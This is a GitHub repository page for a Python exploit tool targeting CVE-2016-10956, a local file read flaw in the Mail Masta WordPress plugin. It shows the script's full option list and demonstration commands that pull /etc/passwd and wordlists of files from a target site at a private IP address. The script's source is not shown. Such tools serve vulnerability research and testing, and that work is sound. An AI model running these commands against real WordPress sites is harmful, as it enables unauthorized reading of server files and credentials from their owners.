Skip to content

MailMasta wordpress plugin Local File Inclusion vulnerability (CVE-2016-10956)

Notifications You must be signed in to change notification settings

p0dalirius/CVE-2016-10956-mail-masta

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Mail Masta - Local File Read (CVE-2016-10956)

GitHub release (latest by date) YouTube Channel Subscribers

The mail-masta plugin 1.0 for WordPress has local file read in count_of_send.php and csvexport.php.

Usage

$ ./CVE-2016-10956_mail_masta.py -h
[+] Mail Masta - Local File Read (CVE-2016-10956)

usage: CVE-2016-10956_mail_masta.py [-h] [-v] [-s] -t TARGET_URL [-f FILE | -F FILELIST] [-D DUMP_DIR] [-k] [-r]

Description message

optional arguments:
  -h, --help            show this help message and exit
  -v, --verbose         Verbose mode
  -s, --only-success    Only print successful read file attempts.
  -t TARGET_URL, --target TARGET_URL
                        URL of the wordpress to connect to.
  -f FILE, --file FILE  Remote file to read.
  -F FILELIST, --filelist FILELIST
                        File containing a list of paths to files to read remotely.
  -D DUMP_DIR, --dump-dir DUMP_DIR
                        Directory where the dumped files will be stored.
  -k, --insecure        Allow insecure server connections when using SSL (default: False)
  -r, --raw             Raw dump of the file without php base64 wrapper (default: False)

Demonstration

Read a specific remote file

./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -f /etc/passwd

Read specific remote files from a wordlist

./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -F wordlist

Read specific remote files from a wordlist and only printing found files

./CVE-2016-10956_mail_masta.py -t http://192.168.56.106/wp/ -F wordlist --only-success

References